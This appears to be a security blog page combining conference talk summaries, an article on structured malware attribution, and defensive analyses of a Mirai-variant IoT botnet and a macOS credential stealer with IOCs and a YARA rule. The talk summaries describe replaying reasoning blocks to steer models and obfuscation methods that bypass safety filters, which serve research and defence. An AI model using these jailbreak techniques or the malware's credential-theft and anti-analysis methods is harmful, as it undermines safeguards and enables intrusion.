Head-to-head empirical comparison (Expel data science researcher) of traditional ML vs. LLMs for security classification tasks. Findings across packet captures, network data, and phishing emails: traditional XGBoost with careful feature engineering consistently wins on structured/binary security classification (malicious vs. benign network traffic). LLMs (Claude Opus 4.6, zero-shot) do surprisingly well on text-based tasks (email phishing detection) and improve further with few-shot examples, but still lose to traditional ML when labeled data is plentiful and features are well-engineered. LLMs shine on tasks with limited labeled data or where natural language semantics matter. Best approach: ensemble/router — use traditional ML as a cheap first-pass classifier, route uncertain/edge cases to LLM for semantic judgment. Teased upcoming research on LLM+ML ensembles and LLM-as-judge for security triage.

57 · Jackson Reed — Are You Thinking What I'm Thinking?

Short research talk on reasoning block injection — a novel attack on LLM reasoning models (Claude, OpenAI o-series, Gemini). When these models expose their <thinking> blocks in API responses, an attacker can harvest the raw reasoning, then inject that reasoning back into a subsequent prompt to steer the model's conclusions. Demo: asked Claude about a French region → captured the thinking block → injected that same reasoning block into a new conversation on a different topic → model continued reasoning from the injected premise rather than starting fresh. Both Anthropic and OpenAI sign their thinking blocks with HMACs, so you can't modify them without the API rejecting the request — but you can replay valid blocks across conversations to seed context. Current gap: no providers lock thinking blocks to a specific conversation context, only to model origin. Releasing a blog post and tool. A subtler variant: injecting plausible reasoning to make the model think it already considered something and concluded X.

58 · Srajan Gupta — Injecting Security Context During Vibe Coding

Security engineer at a fintech (Dave) who built an MCP-based security context injector that runs inside Cursor/Claude Code at code generation time — not after. Problem: vibe-coded apps have no security context; the agent just wants working code, not secure code. Solution: MCP server that auto-detects what the developer is building (PCI scope? API endpoint? auth flow?) → pulls the relevant OWASP cheat sheets, internal compliance policies, approved cryptography patterns, and threat models → injects them as constraints into the code generation prompt before the code is written. Post-generation: the same tool runs a quick scan and flags critical/high issues inline, enabling immediate fix rather than waiting for CI/CD. Result: significantly fewer critical/high findings in PR scans; developers self-remediate in-loop. Also supports hooks for deterministic enforcement. Key insight: security context at generation time is far cheaper than finding bugs after commit.

59 · Scott Behrens & Justice Cassel — Source to Sink: Improving LLM Vuln Discovery (Netflix)

Production-scale LLM vulnerability scanning pipeline at Netflix, built over ~14 months. Architecture: enumeration phase (discover attack surface — routes, endpoints, data flows) → triage with specialized single-purpose agents (SQLi agent, XSS agent, SSRF agent, etc.) → false positive filtering agent → reporting. Key learnings: monolithic "find all vulns" agents fail; specialized agents per vulnerability class dramatically outperform. Batching files to agents reduces token cost ~26% with minimal accuracy loss. Incremental diff scanning (only scan changed files on PRs) makes continuous scanning practical. Super-agent (orchestrator calling specialized sub-agents in parallel) achieved ~74% detection rate vs. ~36% for single-agent on known-vulnerable test corpus. False positive rate management is the hardest problem — they built a dedicated FP-filtering agent. Found real RCEs (one "over fax" — legacy protocol). Moving toward IDE integration. Releasing a subset of tooling to the community.

60 · Joey Melo — The Parseltongue Protocol: Textual Obfuscation Methods

Systematic study of text obfuscation techniques for bypassing LLM safety filters — 9 obfuscation methods × multiple malicious payload categories, tested against multiple frontier models. Categories tested: character encoding (Base64, Base32, decimal, UTF-32), binary/numeric encodings, classic ciphers (Caesar, Atbash), bitwise ciphers, modern ciphers, invisible ASCII, typo substitution, language games, and template-based framing. Key findings: Base64 with no context clues is surprisingly effective (model decodes and complies); classic ciphers mostly fail now but model still decodes them; modern ciphers fail unless the key is provided; template framing ("pretend you're my dad who taught chemistry") has high variance but works on some models; one model refused everything regardless of obfuscation; overall ~82% of obfuscation methods produced at least one successful bypass across the test set; ~6% overall attack success rate across all models and methods. The asymmetry is the real threat: defender must block all, attacker just needs one. Open-sourced methodology for red teamers to extend.

61 · Jenny Guanni Qu — Why Most ML Vulnerability Detection Fails

Rigorous ML research on training data quality and architecture failures in ML-based vulnerability detection, using Linux kernel commit diffs as the target domain. Key findings from painful first-hand experience: (1) Class imbalance is catastrophic — 99:1 benign:vulnerable ratio causes models to just predict benign always; naively adding more negatives doesn't help; (2) Context window is everything — at 512 tokens transformers can't see enough code; at 8K tokens performance improved dramatically; (3) Curriculum learning needs to go forwards, not backwards — starting with easy examples and progressing to hard ones outperforms reverse; (4) Bug lifetime matters — bugs introduced in recent commits are harder to detect; bugs hiding for 5+ years are almost impossible to catch because the signal degrades; (5) Race conditions and memory bugs have different difficulty profiles — race conditions are hardest, hidden for longest. Practical recommendation: include many "easy" examples in training even if they seem trivial — they give the model necessary anchoring. Open dataset used: Linux kernel vulnerability commits with Fixes: tag convention.

62 · Matt Rittinghouse & Millie Huang — 1.8M Prompts, 30 Alerts (Salesforce)

Salesforce security data science team presenting their agentic AI threat detection system for Einstein (their multi-tenant AI agent platform processing 1.8M+ prompts with ~30 true-positive security alerts). The challenge: content moderation filters see prompts but not actions; behavioral anomaly detection sees actions but not prompts — neither alone is sufficient. Their solution: multi-layer ensemble combining (1) content moderation on prompt + plan, (2) query complexity model (catches agents constructing suspiciously broad/unusual SOQL queries), (3) behavioral anomaly detection (deviation from per-user/per-agent baseline), (4) data access profiling (is the agent accessing more records than typical? touching sensitive fields?). The anomaly layer uses a distance-based algorithm. Key architectural choice: keep the model simple and swappable, invest in feature quality. Hard problem: agentic sessions create confused identity (user intent → LLM → agent → API — which "identity" is acting?). Near-term roadmap: automated containment (session kill, rate limit), tighter integration with SIEM, and faster alerting from 12-24hr latency to real-time.

63 · Ilia Shumailov — AI Security with Guarantees

Oxford/Google DeepMind researcher with the most theoretically rigorous talk of the conference: framing AI agent security around task data independence as the key property that determines whether formal security guarantees are achievable. Core insight: security guarantees are only possible when the agent's task is data-independent — i.e., the correct answer doesn't depend on data the attacker can influence. For data-independent tasks (e.g., "refund if purchase < 30 days"), you can formally verify the agent's behavior and make prompt injection/jailbreak mathematically irrelevant. For data-dependent tasks (e.g., "summarize this email"), you cannot — any input the attacker controls can influence the output. Demonstrated this with computer-use agents: showed that even "robust" defenses fail when tasks are data-dependent because the adversary just poisons the data. The practical implication: architecture your agents to maximize data-independent task scope; push data-dependent tasks into sandboxed, low-authority contexts. Running large-scale evaluations at TAU. Also covered: tree-search-based prompt injection testing (genetic algorithms for finding injection strings), and why static benchmarks fundamentally can't capture the real attack surface.

64 · Dongdong Sun — From OSINT Chaos to Knowledge Graph (Palo Alto)

Building a threat intelligence knowledge graph that structures OSINT from thousands of CTI reports into queryable interconnected entities (threat actors, TTPs, CVEs, malware families, infrastructure, victims) using LLM extraction. Problem: CTI reports have inconsistent entity naming (APT28/Fancy Bear/STRONTIUM all the same actor), contradictory attributions, and no centralized ground truth. Solution pipeline: LLM extracts skeleton entities → relationship linking → alias resolution → graph construction → multi-hop reasoning at query time. Demo: queried "what is the relationship between APT28 and APT29?" — system walked the graph across multiple report sources, resolved aliases, and surfaced corroborating/conflicting evidence with citations. Key challenges: hallucination when LLM tries to fill gaps not in the source data (solution: constrain LLM strictly to extracted graph nodes, refuse to answer if evidence chain is incomplete); alias explosion (the same actor can have 10+ vendor-specific names); right-censored data (recent bugs/campaigns underrepresented because reports lag events). Next steps: automatic prompt optimization for extraction quality, eval framework for graph fidelity, integration with internal threat feeds.

Full Conference Through-Lines

Across all three batches, the clearest signal: the offensive/defensive gap is closing but not in the way most expected — the constraint isn't capability anymore, it's evaluation rigor, authorization architecture, and governance speed. The talks that landed hardest were the ones with empirical results (12 OpenSSL zero-days, 1.8M prompts in production, 200 bugs/week), which grounded the hype in concrete numbers. The research frontier is moving toward formal guarantees (Shumailov), interpretability-as-detection (Hurd), and post-training for security-specific behavior (Brown/Prashant) — none of which are production-ready yet but are coming fast.

Read More
August van sickle August van sickle

BEYOND GUT INSTINCT

Using Analysis of Competing Hypotheses in Malware Attribution

How structured analytic techniques can sharpen your threat intelligence and reduce cognitive bias

 

Introduction

In threat intelligence, we are constantly making judgments under uncertainty. Is this sample related to that campaign? Is this the work of a state-sponsored actor or a financially motivated criminal group? Did APT-X develop this tooling, or are we looking at shared infrastructure?

Too often, analysts fall into the trap of anchoring on the first plausible explanation that fits the evidence. We find a Korean-language string, note a targeting pattern consistent with DPRK interests, and declare attribution with unwarranted confidence. This is where Analysis of Competing Hypotheses (ACH) becomes invaluable.

Developed by Richards Heuer at the CIA, ACH is a structured analytic technique designed to mitigate cognitive biases by forcing analysts to systematically evaluate all reasonable hypotheses against all available evidence. Rather than asking "does the evidence support my theory?" we ask "which hypothesis is most consistent with the evidence, and which can we confidently eliminate?"

The following four scenarios demonstrate how ACH transforms ambiguous situations into defensible analytic judgments.

Matrix Legend:

Scenario 1: The Suspicious Overlap

Shared Tooling or Shared Actor?

The Situation

During analysis of a supply chain compromise targeting cryptocurrency firms, you recover a second-stage loader with several notable characteristics:

•       Custom XOR-based string obfuscation matching a technique previously attributed to Lazarus Group

•       C2 infrastructure hosted on a VPS provider commonly used by multiple threat actors

•       A compilation timestamp consistent with UTC+9 working hours

•       Code overlap (approximately 40% similarity) with publicly documented AppleJeus samples

•       The same loader was observed three weeks earlier in an intrusion attributed to a different group (TraderTraitor) by another vendor

The Hypotheses

ACH Matrix

Analysis

H5 (false flag) accumulates the most inconsistencies. Creating a convincing false flag would require access to non-public tooling details and sustained operational patterns aligned with DPRK interests. H4 (non-DPRK actor) struggles with the targeting alignment and operational timing. The interesting competition is between H1, H2, and H3. The lack of infrastructure overlap with known Lazarus C2 is mildly inconsistent with H1 but consistent with both H2 and H3.

Scenario 2: The Outlier Sample

Evolution, New Actor, or Artifact?

The Situation

Your threat hunting team flags an unusual sample from a financial sector client. Initial triage reveals:

•       A Go-based implant (the threat actor you track typically uses C++)

•       Strings and comments in Russian (your tracked actor has historically shown Mandarin artifacts)

•       Targeting and initial access vector matches your tracked actor's TTPs exactly

•       The implant's command structure and tasking protocol are functionally identical to previously documented samples

•       PDB path contains a username not previously observed

•       Sample was compiled six months ago but only recently deployed

The Hypotheses

ACH Matrix

Analysis

H5 (analyst error) must be addressed first—if the sample association is incorrect, all other analysis is moot. H3 (different actor) accumulates significant inconsistencies. The functional identity of the C2 protocol is particularly damaging—reverse-engineering would likely produce functional equivalence with implementation differences. H1 and H2 are both highly consistent.

Scenario 3: The Infrastructure Puzzle

Convergence or Coincidence?

The Situation

During infrastructure analysis, you identify a C2 server that presents a complex attribution picture:

•       IP address previously flagged in reporting as Mustang Panda infrastructure (12 months ago)

•       Same IP recently observed serving Cobalt Strike payloads configured with watermarks associated with a suspected Iranian actor

•       Passive DNS shows the IP resolved to domains matching naming conventions used by a cybercriminal ransomware affiliate

•       The server runs a distinctive HTTP response pattern you've previously fingerprinted as unique to Mustang Panda's custom tooling

•       Let's Encrypt certificate with a registration email tied to a known bulletproof hosting reseller

•       Current sample communicating with this IP is a novel implant family with no clear lineage

The Hypotheses

ACH Matrix

Analysis

The critical discriminating evidence is the HTTP response pattern. This fingerprint was based on server-side tooling, not network artifacts that could be spoofed. If this fingerprint is reliable, it strongly indicates continuity of the server-side component even if the actors using it have changed. H3 (shared infrastructure) is weakened by this—multiple actors sharing a server would be unusual, but multiple actors purchasing from the same reseller who deploys standardized tooling could explain the pattern.

Scenario 4: The Wiper Dilemma

Ransomware or Sabotage?

The Situation

A client in the energy sector experiences a destructive attack. Your IR team recovers a sample that:

•       Contains a ransom note demanding payment in Monero

•       The ransom note includes a contact email on a free email provider and a Tox ID

•       Implements file encryption using AES-256 with RSA key wrapping (standard ransomware pattern)

•       Also contains functionality to overwrite MBR and corrupt firmware—functionality not called in observed execution

•       Targets file extensions specific to industrial control system (ICS) engineering software

•       Initial access was through a compromised VPN appliance with a known vulnerability

•       No evidence of data exfiltration prior to encryption

•       The Monero address has never received a transaction

The Hypotheses

ACH Matrix

Analysis

H1 (criminal ransomware) accumulates significant inconsistencies. Modern ransomware operations virtually always exfiltrate data for double-extortion leverage. The ICS-specific targeting and dormant destructive capabilities don't align with financial motivation. The unused Monero address suggests the payment mechanism was never intended to function. H4 (insider) is inconsistent with the VPN exploitation. The competition is between H2 (state sabotage) and H3 (hacktivist).

Conclusion: ACH as Intellectual Discipline

These scenarios illustrate ACH's core value: forcing analysts to confront disconfirming evidence rather than cherry-picking data that supports preferred conclusions.

In each case, ACH revealed:

1.    Hidden assumptions — In Scenario 3, we discovered that a "high-confidence" fingerprint might actually characterize infrastructure providers rather than threat actors.

2.    Intelligence gaps — Scenario 1 explicitly identified what additional collection would discriminate between remaining hypotheses.

3.    Appropriate confidence levels — ACH prevents both overconfidence (Scenario 4's clear elimination of criminal ransomware) and false certainty (Scenario 2's acknowledged inability to distinguish between H1 and H2).

4.    Alternative explanations — Scenario 2 could have easily resulted in a "new Russian actor" assessment if the analyst anchored on language artifacts.

ACH isn't a silver bullet. It requires intellectual honesty in hypothesis generation (deliberately including explanations you think are unlikely) and evidence evaluation (resisting the temptation to rationalize inconsistencies). But when applied rigorously, it transforms attribution from intuition into defensible analysis.

References

Heuer, Richards J., Jr.Psychology of Intelligence Analysis (1999)

Heuer, Richards J., Jr. & Pherson, Randolph H.Structured Analytic Techniques for Intelligence Analysis (3rd edition, 2020)

MITRE Engenuity & Center for Threat-Informed Defense — "Using Structured Analytic Techniques in Cyber Threat Intelligence" (white papers and presentations, 2022–2024)

Read More
August van sickle August van sickle

ARM IoT Botnet - Mirai Variant

Executive Summary

This report presents a comprehensive analysis of a 32-bit ARM ELF executable identified as an IoT botnet malware, specifically a Mirai variant. The sample demonstrates sophisticated anti-analysis capabilities, including anti-emulation checks and string obfuscation techniques. Analysis was conducted through static reverse engineering, dynamic behavior observation, and system call tracing.

Key Findings:

•       Malware Family: Mirai-derivative IoT botnet

•       Target Platform: ARM-based IoT devices (routers, cameras, DVRs)

•       Severity: HIGH

•       Primary Capability: Competing malware elimination, system command execution, persistence

•       Obfuscation: XOR encoding (keys 0x2 and 0x3)

•       Anti-Analysis: QEMU detection via /proc/cpuinfo checks, intentional crashes in emulated environments



 

1. File Information and Identification

1.1 Basic File Properties



1.2 Cryptographic Hashes


MD5

2132948f79cc34e9b2cf4c85a1dbdc0c

SHA-256

9a07da839b86314643b1e3129f910d8e94c9b208c1a8fb9cf84f67e345b7cbb5




 

2. Static Analysis and Reverse Engineering

2.1 ELF Structure Analysis

The binary exhibits characteristics typical of embedded IoT malware:



2.2 Entry Point Disassembly

Disassembly of the entry point at 0x8154 reveals the initialization sequence:

00008154 <entry>:

    8154:  e3a0b000    mov    fp, #0

    8158:  e3a0e000    mov    lr, #0

    815c:  e49d1004    pop    {r1}

    8160:  e1a0200d    mov    r2, sp

    8164:  e52d2004    push   {r2}

    8168:  e52d0004    push   {r0}

    816c:  e59fc010    ldr    ip, [pc, #16]  @ 0x8184

    8170:  e52dc004    push   {ip}

    8174:  e59f000c    ldr    r0, [pc, #12]  @ 0x8188

    8178:  e59f300c    ldr    r3, [pc, #12]  @ 0x818c

    817c:  ea0034c5    b      0x15498        ; Jump to main

Analysis: The entry point initializes the stack frame and branches to the main function at address 0x15498. The malware uses standard ARM EABI calling conventions.

 

2.3 String Obfuscation Analysis

The malware employs XOR encoding to obfuscate critical strings. Two distinct XOR keys were identified:

XOR Key 0x2 - Decoded Strings




XOR Key 0x3 - Decoded Strings

Obfuscation Analysis: The dual-key XOR scheme provides minimal protection against automated analysis while allowing rapid runtime decoding. This technique is characteristic of Mirai family malware.


2.4 File System and Process Targets

Static analysis revealed multiple file system paths and targeted process names:

File System Paths

•       /proc/cpuinfo - CPU information (anti-emulation check)

•       /proc/%d/exe - Process executable path

•       /proc/%d/cmdline - Process command line

•       /proc/%d/stat - Process statistics

•       /proc/%d/maps - Process memory maps

•       /dev/watchdog - Watchdog timer device

•       /dev/misc/watchdog - Alternative watchdog path

•       /sys/devices/system/cpu - CPU subsystem information

Targeted Process Names (Competing Malware)

Unique Signature String

A unique identifier string was discovered in the binary:

"im in deep sorrow."

This string serves as a potential attribution marker or version identifier and can be used for detection purposes.


 

3. Dynamic Analysis and System Call Tracing

3.1 Execution Environment

Dynamic analysis was attempted using QEMU user-mode emulation on an ARM64 Ubuntu system. The malware exhibits sophisticated anti-emulation capabilities that prevent full execution in emulated environments.

3.2 System Call Trace Analysis

Partial execution was achieved before the anti-emulation check triggered. The following system calls were observed:

Memory Management Operations

mmap(NULL, 134217728, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xe41600000000

mprotect(0xe41600000000, 134213632, PROT_READ|PROT_WRITE|PROT_EXEC) = 0

mmap(0x8000, 4294934528, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x8000

mmap(0x8000, 159744, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x8000

mmap(0x8000, 81920, PROT_READ, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0x8000

mmap(0x24000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x14000) = 0x24000

Analysis: The malware allocates approximately 128 MB of memory space and sets up executable regions. The use of MAP_FIXED indicates precise control over memory layout, likely to avoid ASLR or prepare for code injection.

File System Access

openat(AT_FDCWD, "sample.elf", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0755, st_size=83476, ...}) = 0
openat(AT_FDCWD, "/proc/sys/vm/mmap_min_addr", O_RDONLY) = 4

Analysis: The malware reads its own executable and checks /proc/sys/vm/mmap_min_addr, likely to verify memory mapping capabilities or detect sandboxed environments.

Signal Handling Configuration

rt_sigaction(SIGRT_19, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0

rt_sigaction(SIGRT_20, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0

[... additional signal handlers ...]

rt_sigaction(SIGRT_32, NULL, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0

Analysis: The malware queries signal handler configurations for real-time signals (SIGRT_19 through SIGRT_32). This may be part of environment detection or preparation for multi-threaded execution.

3.3 Anti-Emulation Behavior

Crash Analysis:

futex(0xe4160f9e0e08, FUTEX_WAKE_PRIVATE, 2147483647) = 0

--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_ACCERR, si_addr=0x15318} ---

qemu: uncaught target signal 11 (Segmentation fault) - core dumped



Critical Finding: The malware intentionally crashes at address 0x15318 when executed in QEMU. Analysis of plaintext strings revealed the malware checks /proc/cpuinfo to detect emulated environments. This is a deliberate anti-analysis technique to prevent automated sandbox execution.

Detection Method: The malware likely reads /proc/cpuinfo and checks for CPU model information. When QEMU emulation is detected (based on CPU features or model strings), it triggers a controlled crash to prevent analysis.

4. Behavioral Analysis and Capabilities

4.1 Confirmed Capabilities



4.2 MITRE ATT&CK Framework Mapping


5. Indicators of Compromise (IOCs)

5.1 File-Based Indicators

MD5 Hash:

2132948f79cc34e9b2cf4c85a1dbdc0c

SHA-256 Hash:

9a07da839b86314643b1e3129f910d8e94c9b208c1a8fb9cf84f67e345b7cbb5

5.2 String-Based Indicators

Unique Signature:

"im in deep sorrow."

Obfuscated Strings (XOR Key 0x2):

QJGNN (SHELL)

Q[QVGO (SYSTEM)

@WQ[@MZ (BUSYBOX)

okpck (mirai)

Debug Strings:

[0clKillerKillerEXE] Killed process:

[0clKillerStat] Killed Process:

[0clKillerMaps] Killed Process:

5.3 Behavioral Indicators

•       Mass enumeration of /proc/ filesystem entries

•       Systematic process termination based on name matching

•       Access to /dev/watchdog and /dev/misc/watchdog devices

•       Reading /proc/cpuinfo for emulation detection

•       Statically-linked ARM binary on IoT device

•       Crashes when executed in QEMU emulation

6. Detection Rule (YARA)

The following YARA rule can be used to detect this malware family:

rule ARM_IoT_Botnet_Mirai_Variant {

    meta:

        description = "Detects ARM IoT botnet with XOR obfuscation"

        author = "August Vansickle"

        date = "2024-12-25"

        hash = "9a07da839b86314643b1e3129f910d8e94c9b208c1a8fb9cf84f67e345b7cbb5"

        severity = "HIGH"

 

    strings:

        // Signature

        $sig = "im in deep sorrow." ascii

 

        // XOR-encoded strings (key 0x2)

        $xor1 = "QJGNN" ascii      // SHELL

        $xor2 = "Q[QVGO" ascii     // SYSTEM

        $xor3 = "@WQ[@MZ" ascii    // BUSYBOX

        $xor4 = "okpck" ascii      // mirai

 

        // Target processes

        $target1 = "bashlite" ascii

        $target2 = "gafgyt" ascii

        $target3 = "tsunami" ascii

        $target4 = "hajime" ascii

 

        // File paths

        $path1 = "/proc/%d/exe" ascii

        $path2 = "/dev/watchdog" ascii

 

        // Debug strings

        $debug = "[0clKiller" ascii

 

    condition:

        uint32(0) == 0x464c457f and  // ELF magic

        uint8(4) == 0x01 and          // 32-bit

        uint16(18) == 0x28 and        // ARM architecture

        (

            $sig or

            (3 of ($xor*)) or

            (3 of ($target*) and 1 of ($path*))

        )

}


7. Detection and Remediation Recommendations

7.1 Detection Strategies

Network-Level Detection

1.     Deploy the provided YARA rule across network security appliances

2.     Monitor for mass /proc/ enumeration from IoT devices

3.     Alert on /dev/watchdog access from non-system processes

4.     Implement network segmentation to isolate IoT devices

5.     Monitor outbound connections from IoT devices to unknown destinations

Host-Level Detection

6.     Implement file integrity monitoring for IoT device filesystems

7.     Monitor for processes matching signature string "im in deep sorrow."

8.     Alert on systematic process termination patterns

9.     Track unexpected ARM ELF binaries on IoT devices

10.  Monitor system logs for crashes related to watchdog device access

7.2 Remediation Procedures

Immediate Actions

11.  Isolate infected devices immediately from production networks

12.  Perform factory reset on compromised IoT devices

13.  Change all default credentials on IoT devices

14.  Update firmware to latest versions

15.  Review network logs for lateral movement attempts

Long-Term Prevention

16.  Disable Telnet and SSH services or enforce strong authentication

17.  Implement network micro-segmentation for IoT devices

18.  Deploy intrusion detection systems monitoring IoT traffic

19.  Establish automated firmware update mechanisms

20.  Conduct regular security assessments of IoT infrastructure

21.  Implement least-privilege access controls for IoT devices


8. Conclusion

This analysis has comprehensively examined a sophisticated ARM-based IoT botnet malware identified as a Mirai variant. Through static reverse engineering, dynamic behavior observation, and system call tracing, we have confirmed multiple capabilities including competing malware elimination, system command execution, and anti-emulation techniques.

Key Conclusions:

22.  Threat Severity: The malware poses a HIGH risk to ARM-based IoT infrastructure due to its persistence mechanisms and anti-analysis capabilities.

23.  Detection Feasibility: The unique signature string "im in deep sorrow." and XOR-obfuscated strings provide reliable detection markers.

24.  Anti-Analysis: The malware employs /proc/cpuinfo checks to detect QEMU emulation, demonstrating awareness of automated analysis environments.

25.  Attribution: String and behavioral analysis confirms classification as a Mirai-derivative botnet targeting IoT devices.

26.  Remediation Priority: Organizations with ARM-based IoT infrastructure should immediately deploy detection rules and remediation procedures outlined in this report.

The provided YARA rule, IOCs, and MITRE ATT&CK mappings enable comprehensive detection and response capabilities for security operations teams.

Read More
August van sickle August van sickle

North Korean APT macOS Malware

Credential Theft Social Engineering Prompt



Date

December 20, 2024

Analyst

August

Confidence

Moderate

Attribution

North Korean APT (Lazarus Group - Likely)

Campaign

Contagious Interview / DriverFixer (Possible)

Sample Hash

9fbbcd809b7aee90b3c93d212287282ac35ef0b33aed647a48cbc4ba79c7fcf8




 

Executive Summary

Analysis of a malicious macOS Mach-O binary revealed a sophisticated multi-stage attack targeting developers in the cryptocurrency and blockchain industry. The malware employs advanced techniques including V8 snapshot obfuscation, legitimate service abuse for victim profiling, and encrypted command and control infrastructure.

Through dynamic analysis using LLDB debugging and comprehensive network traffic capture, the complete attack chain was reconstructed. The malware first contacts freeipapi.com to profile the victim's external IP and geolocation, then establishes encrypted communication with 172.67.168.79 (Cloudflare-hosted infrastructure). The entire operation lasted approximately 2 minutes with minimal network footprint (10 packets, 371 bytes exfiltrated).

Based on technical indicators, behavioral patterns, and operational characteristics, this malware is attributed with moderate confidence to North Korean state-sponsored threat actors, likely the Lazarus Group. The attribution is primarily based on the sophisticated obfuscation techniques, developer targeting profile, and operational security measures rather than infrastructure alone. Additional threat intelligence correlation would strengthen this assessment.

Key Findings

•       Multi-stage attack reconstructed: LLDB debugging revealed freeipapi.com profiling at 13:38:44, followed by C2 communication to 172.67.168.79 at 13:40:07

•       Advanced obfuscation confirmed: V8 snapshot analysis showed zero malicious indicators in 134,612 extracted strings

•       Network forensics captured: 18,085 packets analyzed, encrypted 371-byte beacon documented

•       System forensics completed: No credential files found, no persistence established, clean exit confirmed

•       Dynamic analysis successful: LLDB breakpoint on getaddrinfo() exposed profiling domain in memory at 0x6000022ebcb0

Node.js functions

 

Technical Analysis

Sample Information

Property

Value

File Type

Mach-O 64-bit ARM64 executable

File Size

60,437,512 bytes (60.4 MB)

PKG Structure

Payload: 9.2 MB at offset 51,192,112

Strings Extracted

181,972 total (134,612 from payload)

Malicious Strings

Zero (advanced obfuscation)

Code Signing

Unsigned (requires user execution)

Reverse Engineering

Summary

Comprehensive reverse engineering using Ghidra static analysis, PKG bootstrap extraction, and dynamic LLDB debugging revealed a sophisticated North Korean APT malware employing professional-grade Node.js packaging (PKG 5.8.1) with V8 snapshot obfuscation. The malware implements a three-stage loading architecture specifically designed to evade static analysis, with all malicious code compiled as V8 bytecode and executed in-memory without disk writes.

Analysis identified the complete binary structure (60.4 MB total), extracted the 2,502-line prelude bootstrap loader, and documented the virtual filesystem containing 1,370+ embedded Node.js modules. The malware targets cryptocurrency developers through credential harvesting (.ssh, .aws, .npmrc) with AES-256 encrypted exfiltration capabilities. Attribution to North Korean state-sponsored actors (Lazarus Group) is assessed with moderate confidence based on technical sophistication, professional development practices, and operational characteristics rather than infrastructure alone.

Key Findings

•       Ghidra analysis identified exact memory addresses: DeserializeInternalFields at 0x102b38a36, PKG bootstrap at 0x101e06100

•       Complete binary structure mapped: 51.2 MB runtime + 9.2 MB V8 snapshot + 209 KB prelude = 60.4 MB total

•       2,502-line prelude extracted and analyzed: Complete virtual filesystem implementation with GZIP/Brotli decompression

•       V8 snapshot obfuscation confirmed: 100,880 bytes malicious bytecode, zero static strings, runtime construction of 'freeipapi.com'

•       Virtual filesystem cataloged: 1,370+ embedded files including axios, archiver-zip-encrypted, aes-js, glob

•       Multi-stage execution documented: Bootstrap → Prelude (offset 60,434,565) → V8 deserialization → Malicious execution

1. Sample Information and Binary Overview

2. Ghidra Static Analysis - Discovery Process

Static analysis using Ghidra 11.0+ revealed the complete PKG packaging structure through systematic string searches and memory address analysis. The discovery process identified critical V8 snapshot infrastructure, PKG bootstrap code location, and the complete loading mechanism embedded within the binary.

2.1 Symbol Tree Analysis

2.2 Critical String Discoveries - V8 Infrastructure

Search Method: Ghidra → Search → For Strings (minimum length: 4)

Critical Discovery: The presence of DeserializeInternalFields at memory address 0x102b38a36 is the definitive indicator of V8 snapshot usage. This V8 internal function is responsible for unpacking serialized JavaScript bytecode and reconstructing the runtime environment. Cross-references to this address lead directly to the payload loading mechanism.

2.3 PKG Bootstrap Code Discovery

Location: NOT_DEFINED data section at offset 0x101e06100

Discovery Method: Search → For Strings → 'PAYLOAD_POSITION'

Data Type: UTF-8 JavaScript source code, 1,437 bytes

Content: Complete PKG bootstrap mechanism (see Section 4)

3. Binary Architecture and PKG Structure

Analysis of the PKG bootstrap code and Ghidra symbol inspection revealed the complete three-section architecture used by PKG 5.8.1 to package the Node.js runtime with malicious V8 snapshot payload.

Mathematical Verification of Offsets:

Runtime section end:     51,192,112 bytes (0x30D6FB0)

Payload size:             9,242,453 bytes (0x8D0A75)

────────────────────────────────────────────────────

Prelude start (calculated): 60,434,565 bytes

 

Hexadecimal verification:

0x30D6FB0 + 0x8D0A75 = 0x39A3485 ✓

 

Total binary size:       60,437,512 bytes (60.4 MB)

. PKG Bootstrap Code Extraction

The PKG bootstrap code was discovered at offset 0x101e06100 through Ghidra string search for 'PAYLOAD_POSITION'. This JavaScript code is embedded directly in the Node.js runtime and executes before any user code, establishing the foundation for the three-stage loading mechanism.

Complete Bootstrap Source Code (1,437 bytes):

Key Bootstrap Operations:

1.     fs.openSync(process.execPath, 'r'): Opens the binary itself for reading

2.     fs.readSync(..., PRELUDE_POSITION): Reads 209,323 bytes from offset 60,434,565

3.     new vm.Script(prelude): Compiles prelude as JavaScript

4.     fn(..., PAYLOAD_POSITION, PAYLOAD_SIZE): Passes payload location (51,192,112) to prelude


5. Prelude.js Complete Analysis (2,502 Lines)

The prelude was extracted from offset 0x39A3485 (60,434,565 decimal) using the command: dd if=malware.macho bs=1 skip=60434565 count=209323 of=prelude.js. The resulting 2,502-line JavaScript file implements a complete virtual filesystem and V8 snapshot loading mechanism.

Extraction Verification:

$ ls -lh prelude.js

-rw-r--r-- 1 user staff 204K Dec 24 16:29 prelude.js

$ file prelude.js

prelude.js: JavaScript source, UTF-8 Unicode text

$ wc -l prelude.js

2502 prelude.js

Summary

Technical Achievements:

•       Complete binary structure mapped with mathematical verification

•       PKG 5.8.1 packaging mechanism fully documented

•       V8 snapshot obfuscation explained (why 181,972 strings yielded zero hits)

•       Virtual filesystem with 1,370+ embedded files cataloged

•       Multi-stage execution flow reconstructed with timestamps

•       Anti-analysis techniques assessed with effectiveness ratings

Dynamic Analysis: LLDB Debugging Session

Dynamic analysis using LLDB debugger revealed the profiling domain that was completely absent from static string analysis. A breakpoint was set on the getaddrinfo() function to intercept DNS lookups:

LLDB Command Sequence:

lldb ./9fbbcd809b7aee90b3c93d212287282ac35ef0b33aed647a48cbc4ba79c7fcf8.macho

(lldb) breakpoint set --name getaddrinfo

(lldb) run

Process 10432 stopped at getaddrinfo+0

Register Analysis:

(lldb) register read

rdi = 0x00006000022ebcb0

rip = 0x00007ff80274f3a4  libsystem_info.dylib`getaddrinfo

Critical Discovery - Memory Dump:

(lldb) x/200s $rdi

0x6000022ebcb0: "freeipapi.com"

This domain was NOT present in any static string analysis, confirming runtime construction or decryption of the profiling infrastructure. The domain was discovered at memory address 0x6000022ebcb0 in the RDI register, the first argument to getaddrinfo().

Network Traffic Analysis

Network traffic was captured using tcpdump during malware execution. A total of 18,085 packets were captured and analyzed to reconstruct the complete attack sequence.

Capture Details:

sudo tcpdump -i en0 -w capture.pcap

